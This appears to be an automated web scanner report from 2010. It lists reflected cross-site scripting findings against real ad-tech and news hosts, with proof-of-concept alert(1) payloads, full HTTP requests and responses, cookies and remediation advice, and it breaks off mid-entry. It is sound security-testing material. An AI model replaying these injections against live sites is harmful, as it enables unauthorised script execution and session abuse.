HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:49:41 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwNDU4MTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 11480
1.45. http://apartments.oodle.com/regions/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://apartments.oodle.com
Path:
/regions/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc3bf"-alert(1)-"ee4c3c54178 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /regions/?dc3bf"-alert(1)-"ee4c3c54178=1 HTTP/1.1 Host: apartments.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Fri, 26 Nov 2010 20:51:28 GMT Content-Length: 23134 Connection: close Set-Cookie: otu=479d7bb8883eb695ef5d9dc9e5d2cd26; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: ots=9a80a5cba383c56a293fa928e7762a79; path=/; domain=.oodle.com Set-Cookie: a=dT1GMjUzQTJFOTRDRjAxREQx; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODA0Njg5O30%3D; path=/; domain=.oodle.com Set-Cookie: loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 2b8e6<script>alert(1)</script>78a5428e6c2 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wds2b8e6<script>alert(1)</script>78a5428e6c2&admeld_user_id=5a738589-032a-45ab-a7ad-eba47ded6846&callback_url=http%3A%2F%2Ftag%2Eadmeld%2Ecom%2Fpixel%3Fadmeld%5Fdataprovider%5Fid%3D4 HTTP/1.1 Host: api.bizographics.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold?t=1290805802796&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2Fp%2Fstatic%2Fsite_map_H9QJodTDYACLl6K25PCpdN&refer= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BizoNetworkPartnerIndex=11; BizoID=9e16e021-9703-4d88-b0c1-c427a2aba88d; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WV4QlNoWqeHUqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KehDiphzztl1Waj5XcunNcMDa7Re6IGD4lPlsZLzg8Y9xAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5iif3K3nnDdM5xEJhiiFqK28mJD3iidKfXxisS82BSc6FNV4ie
Response
HTTP/1.1 403 Forbidden Cache-Control: no-cache Content-Type: text/plain Date: Fri, 26 Nov 2010 20:48:09 GMT P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Pragma: no-cache Server: nginx/0.7.61 Content-Length: 84 Connection: keep-alive
Unknown API key: (8dn4jnyemg4ky9svqgs28wds2b8e6<script>alert(1)</script>78a5428e6c2)
The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload cbea5<script>alert(1)</script>02b6e20414e was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wds&admeld_user_id=5a738589-032a-45ab-a7ad-eba47ded6846&callback_url=cbea5<script>alert(1)</script>02b6e20414e HTTP/1.1 Host: api.bizographics.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold?t=1290805802796&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2Fp%2Fstatic%2Fsite_map_H9QJodTDYACLl6K25PCpdN&refer= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BizoNetworkPartnerIndex=11; BizoID=9e16e021-9703-4d88-b0c1-c427a2aba88d; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WV4QlNoWqeHUqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KehDiphzztl1Waj5XcunNcMDa7Re6IGD4lPlsZLzg8Y9xAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5iif3K3nnDdM5xEJhiiFqK28mJD3iidKfXxisS82BSc6FNV4ie
Response
HTTP/1.1 403 Forbidden Cache-Control: no-cache Content-Type: text/plain Date: Fri, 26 Nov 2010 20:48:12 GMT P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Pragma: no-cache Server: nginx/0.7.61 Content-Length: 58 Connection: keep-alive
The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 1468f<script>alert(1)</script>f0f715f44b8 was submitted in the func parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction1468f<script>alert(1)</script>f0f715f44b8&n=ar_int_p72205782&1290805842908 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/promotions/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p43112268=exp=1&initExp=Tue Oct 12 23:30:15 2010&recExp=Tue Oct 12 23:30:15 2010&prad=48493791&arc=37093102&; ar_p68511049=exp=22&initExp=Sun Nov 7 05:51:02 2010&recExp=Tue Nov 9 12:24:17 2010&prad=264243128&arc=186035359&; ar_p71955200=exp=2&initExp=Fri Nov 26 16:10:47 2010&recExp=Fri Nov 26 16:10:47 2010&prad=264210321&arc=189391079&; ar_p72205782=exp=1&initExp=Fri Nov 26 20:18:12 2010&recExp=Fri Nov 26 20:18:12 2010&prad=56621686&arc=39457440&; BMX_3PC=1; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1290802692%2E015%2Cwait%2D%3E10000%2C; UID=1be48349-204.0.5.41-1289109066
Response
HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Nov 2010 20:47:49 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 83
The value of the AR_C request parameter is copied into the HTML document as plain text between tags. The payload 65fea<script>alert(1)</script>0be7d6462b3 was submitted in the AR_C parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bmx3/broker.pli?pid=p72205782&PRAd=56621686&AR_C=3945744065fea<script>alert(1)</script>0be7d6462b3 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/promotions/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p43112268=exp=1&initExp=Tue Oct 12 23:30:15 2010&recExp=Tue Oct 12 23:30:15 2010&prad=48493791&arc=37093102&; ar_p68511049=exp=22&initExp=Sun Nov 7 05:51:02 2010&recExp=Tue Nov 9 12:24:17 2010&prad=264243128&arc=186035359&; ar_p71955200=exp=2&initExp=Fri Nov 26 16:10:47 2010&recExp=Fri Nov 26 16:10:47 2010&prad=264210321&arc=189391079&; UID=1be48349-204.0.5.41-1289109066
Response
HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Nov 2010 20:47:50 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p72205782=exp=1&initExp=Fri Nov 26 20:47:50 2010&recExp=Fri Nov 26 20:47:50 2010&prad=56621686&arc=3945744065fea%3Cscript%3Ealert%281%29%3C%2Fscript%3E0be7d6462b3&; expires=Thu 24-Feb-2011 20:47:50 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1290804470; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 30303
The value of the PRAd request parameter is copied into the HTML document as plain text between tags. The payload 7c6ba<script>alert(1)</script>2feb44acaf7 was submitted in the PRAd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bmx3/broker.pli?pid=p72205782&PRAd=566216867c6ba<script>alert(1)</script>2feb44acaf7&AR_C=39457440 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/promotions/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p43112268=exp=1&initExp=Tue Oct 12 23:30:15 2010&recExp=Tue Oct 12 23:30:15 2010&prad=48493791&arc=37093102&; ar_p68511049=exp=22&initExp=Sun Nov 7 05:51:02 2010&recExp=Tue Nov 9 12:24:17 2010&prad=264243128&arc=186035359&; ar_p71955200=exp=2&initExp=Fri Nov 26 16:10:47 2010&recExp=Fri Nov 26 16:10:47 2010&prad=264210321&arc=189391079&; UID=1be48349-204.0.5.41-1289109066
Response
HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Nov 2010 20:47:49 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p72205782=exp=1&initExp=Fri Nov 26 20:47:49 2010&recExp=Fri Nov 26 20:47:49 2010&prad=566216867c6ba%3Cscript%3Ealert%281%29%3C%2Fscript%3E2feb44acaf7&arc=39457440&; expires=Thu 24-Feb-2011 20:47:49 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1290804469; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 30262
The value of the CN request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c26ab'><script>alert(1)</script>0edf7aa4388 was submitted in the CN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /dynamic/external/ibd.morningstar.com/AP/StockMover.html?CN=AP707c26ab'><script>alert(1)</script>0edf7aa4388&SITE=NYNYP&SECTION=DJSP_COMPLETE&TEMPLATE=DEFAULT HTTP/1.1 Host: breakingnews.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (Linux/SUSE) Set-Cookie: SITE=NYNYP; Path=/ Set-Cookie: SECTION=DJSP_COMPLETE; Path=/ Content-Type: text/html Expires: Fri, 26 Nov 2010 20:51:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 26 Nov 2010 20:51:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 54296
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>Busi ...[SNIP]... <a href='http://hosted.ap.org/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707C26AB'><SCRIPT>ALERT(1)</SCRIPT>0EDF7AA4388.html?CN=AP707C26AB'> ...[SNIP]...
The value of the CN request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 322cc"><script>alert(1)</script>ea993c780ea was submitted in the CN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /dynamic/external/ibd.morningstar.com/AP/StockMover.html?CN=AP707322cc"><script>alert(1)</script>ea993c780ea&SITE=NYNYP&SECTION=DJSP_COMPLETE&TEMPLATE=DEFAULT HTTP/1.1 Host: breakingnews.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (Linux/SUSE) Set-Cookie: SITE=NYNYP; Path=/ Set-Cookie: SECTION=DJSP_COMPLETE; Path=/ Content-Type: text/html Expires: Fri, 26 Nov 2010 20:51:55 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 26 Nov 2010 20:51:55 GMT Connection: close Connection: Transfer-Encoding Content-Length: 54296
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>Busi ...[SNIP]... <form name="FormAPTop" method=get action="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707322CC"><SCRIPT>ALERT(1)</SCRIPT>EA993C780EA.html" style="margin:0px;"> ...[SNIP]...
The value of the PluID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccb60'-alert(1)-'997ae025cc9 was submitted in the PluID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jss/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1902326&PluID=0ccb60'-alert(1)-'997ae025cc9&w=300&h=250&ord=3952419&ucm=true&ncu=$$http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/3/0/%2a/y%3B231851985%3B0-0%3B0%3B37862604%3B4307-300/250%3B39084416/39102173/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1 Host: bs.serving-sys.com.47127.9349.302br.net Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=A19DB3930380CCB941F5CC2FB3B1E00A; Path=/ Content-Type: text/javascript Content-Length: 1461 Date: Fri, 26 Nov 2010 20:48:08 GMT Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9dae6'-alert(1)-'acf0dbd71b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jss/BurstingPipe9dae6'-alert(1)-'acf0dbd71b7/adServer.bs HTTP/1.1 Host: bs.serving-sys.com.47127.9349.302br.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E428A7D316277BA8A490BD2AAB2C033B;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=3618B456B693FCDA3A5001C9348C29F4; Path=/ Content-Type: text/javascript Content-Length: 1225 Date: Fri, 26 Nov 2010 20:41:53 GMT Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b135'-alert(1)-'6e2895fb84f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jss/BurstingPipe/adServer.bs2b135'-alert(1)-'6e2895fb84f HTTP/1.1 Host: bs.serving-sys.com.47127.9349.302br.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E428A7D316277BA8A490BD2AAB2C033B;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=5127DD8FCDA6B7592B42E46B38C8ED68; Path=/ Content-Type: text/javascript Content-Length: 1225 Date: Fri, 26 Nov 2010 20:41:53 GMT Connection: close
The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9126f'-alert(1)-'6021358a216 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jss/BurstingPipe/adServer.bs?cn=rsb&c=289126f'-alert(1)-'6021358a216&pli=1902326&PluID=0&w=300&h=250&ord=3952419&ucm=true&ncu=$$http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/3/0/%2a/y%3B231851985%3B0-0%3B0%3B37862604%3B4307-300/250%3B39084416/39102173/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1 Host: bs.serving-sys.com.47127.9349.302br.net Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=62C41BC832E7F24AC4EC03C8BB6F43A8; Path=/ Content-Type: text/javascript Content-Length: 1461 Date: Fri, 26 Nov 2010 20:48:06 GMT Connection: close
The value of the cn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c69c9'-alert(1)-'849c8fa5112 was submitted in the cn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jss/BurstingPipe/adServer.bs?cn=rsbc69c9'-alert(1)-'849c8fa5112&c=28&pli=1902326&PluID=0&w=300&h=250&ord=3952419&ucm=true&ncu=$$http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/3/0/%2a/y%3B231851985%3B0-0%3B0%3B37862604%3B4307-300/250%3B39084416/39102173/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1 Host: bs.serving-sys.com.47127.9349.302br.net Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=51A9FA45762D62BCEE8FB4DBDB498E85; Path=/ Content-Type: text/javascript Content-Length: 1461 Date: Fri, 26 Nov 2010 20:48:06 GMT Connection: close
The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 691d5'-alert(1)-'f7ffe9dc798 was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jss/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1902326&PluID=0&w=300&h=250691d5'-alert(1)-'f7ffe9dc798&ord=3952419&ucm=true&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3a5e/3/0/%2a/y%3B231851985%3B0-0%3B0%3B37862604%3B4307-300/250%3B39084416/39102173/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1 Host: bs.serving-sys.com.47127.9349.302br.net Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=F6066281FA7CE8108F600BDB639986F6; Path=/ Content-Type: text/javascript Content-Length: 1461 Date: Fri, 26 Nov 2010 20:48:09 GMT Connection: close
1.59. http://bs.serving-sys.com.47127.9349.302br.net/jss/BurstingPipe/adServer.bs [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bs.serving-sys.com.47127.9349.302br.net
Path:
/jss/BurstingPipe/adServer.bs
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e81c'-alert(1)-'f8b51afdb8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jss/BurstingPipe/adServer.bs?9e81c'-alert(1)-'f8b51afdb8e=1 HTTP/1.1 Host: bs.serving-sys.com.47127.9349.302br.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E428A7D316277BA8A490BD2AAB2C033B;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=151BE2FC65054D7EC39904B74296DE88; Path=/ Content-Type: text/javascript Content-Length: 1228 Date: Fri, 26 Nov 2010 20:41:52 GMT Connection: close
The value of the ncu request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 980c0'-alert(1)-'129f7d8add2 was submitted in the ncu parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jss/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1902326&PluID=0&w=300&h=250&ord=3952419&ucm=true&ncu=$$http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/3/0/%2a/y%3B231851985%3B0-0%3B0%3B37862604%3B4307-300/250%3B39084416/39102173/1%3B%3B%7Esscs%3D%3f$$980c0'-alert(1)-'129f7d8add2 HTTP/1.1 Host: bs.serving-sys.com.47127.9349.302br.net Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=3FB96ACAADA6858391DE657462014B33; Path=/ Content-Type: text/javascript Content-Length: 1461 Date: Fri, 26 Nov 2010 20:48:11 GMT Connection: close
The value of the ord request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42ed8'-alert(1)-'b883026bd8b was submitted in the ord parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jss/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1902326&PluID=0&w=300&h=250&ord=395241942ed8'-alert(1)-'b883026bd8b&ucm=true&ncu=$$http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/3/0/%2a/y%3B231851985%3B0-0%3B0%3B37862604%3B4307-300/250%3B39084416/39102173/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1 Host: bs.serving-sys.com.47127.9349.302br.net Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=39A06B782483F80303FD7256658FBB26; Path=/ Content-Type: text/javascript Content-Length: 1461 Date: Fri, 26 Nov 2010 20:48:09 GMT Connection: close
The value of the pli request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b53f'-alert(1)-'8da6aa1da61 was submitted in the pli parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
